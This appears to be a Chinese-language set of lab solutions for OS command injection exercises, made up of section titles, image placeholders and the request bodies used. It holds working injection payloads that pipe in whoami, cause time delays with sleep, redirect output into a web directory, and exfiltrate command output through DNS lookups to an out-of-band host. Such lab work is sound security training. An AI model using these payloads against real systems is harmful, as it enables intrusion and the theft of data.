操作系统命令注入,简单案例

image-20221220152937770

image-20221220155110475

productId=3&storeId=2+|+whoami

image-20221220155125190

具有时间延迟的盲操作系统命令注入

image-20221220160652812

csrf=6MTK8ezPHaRvkb0SrUGDYuzvGsMIPlBT&name=1&email=|sleep+10|&subject=1&message=1

image-20221220160827283

带输出重定向的盲操作系统命令注入

image-20221220162840497

csrf=0RQvmPNElav5S2TjfXdN8AOIlFL7Rdb9&name=1&email=|whoami>>/var/www/images/output.txt|&subject=1&message=1

image-20221220165058948

image-20221220164821632

image-20221220165049256

带外交互的盲操作系统命令注入

image-20221220170412957

image-20221220170930128

csrf=u3WKiY9ANqJGps5Sx4qbt4N2w1bHjQ24&name=1&email=|ping+m8vxmbxifw9lbikzy0wd52nmyd44sugj.oastify.com|&subject=1&message=1

image-20221220170951576

带外数据渗漏的盲目操作系统命令注入

image-20221220171056234

image-20221220171239000

csrf=zFQDrjDaYRKIi4e25nqDp5fGJ7bFESpo&name=1&email=|ping+`whoami`.mndx1bciuwolqizzd0bdk22mddj47vvk.oastify.com|&subject=1&message=1

image-20221220171325655